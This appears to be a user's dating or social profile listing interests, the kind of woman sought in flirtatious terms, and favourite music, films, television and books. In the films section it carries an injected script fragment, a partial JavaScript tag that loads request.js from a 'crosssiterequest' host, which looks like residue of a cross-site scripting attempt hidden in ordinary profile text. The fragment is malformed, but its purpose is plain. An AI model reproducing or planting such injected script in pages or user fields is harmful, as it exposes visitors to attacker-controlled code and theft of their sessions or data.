Passionate romance. Extensive travel. Culture of all kinds. Art, music, and language. Pronounce attire. Cars and boats. Sacred Literature. Balancing the pleasures and pain of society. Teaching sorrows to swim, rather than allowing them to drown you. Entertaining those who wish to share and walk the shores of untested waters. Trusting in the Spirit and giving your soul for the betterment of each other.......
Looking to please self-confident women willing to be mentored. Someone who inspires and desires to be inspired. Secure and racy demeanors of distinction and finness. I guess the term in the US is "hotty".......for me, it doesn't end with the mere pysical attributes.......Let's not overlook the innocense of our souls and they intertwine in battle and truce. There is that civilized side to everyone. Even the insane. How far one is able to depart in their travels is the challenge our characters thrive. The wild side prolongs. The conservative returns. The journey is remembered. For how long, and in what way, is the measure of the journies' value.......True, it only begins there. Then it moves into a world of magnetic attraction and timeless ecstacy that overwhelms the essence of inherrent being. When you can't actually catch your breath and are luvin' it, that's where I like you best. It's a lot of fun. Try it with me.......
Modern, contemporary, and mainstream Jazz, Classical, Baroque, Renaissance, Ecclesiastical.........instrumental and choral.......chambre and solo concertoists, opera production, stage and theatre performance and soundtrack, anything romantic, 70's and 80's rock, open to more.......anything that enhances the mood.......
Adventure, comedy, drama.......documentary and foreign.......all inclusive....... .... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document.write("{}");}..
News, documentaries, Masterpiece Theatre, High Definition channels, some situational comedies, political discussion.......
The Bible, anything Neil Simon, Shakespeare, Chaucer, Nietzsche, Goethe, Greek Antiquity, the entire Norton Anthology of English Literature, Dante, Stalin, Lenon.......dictionaries of all types......any literature helpful to a wordsmith.......really too much to list.......
Jesus Christ.........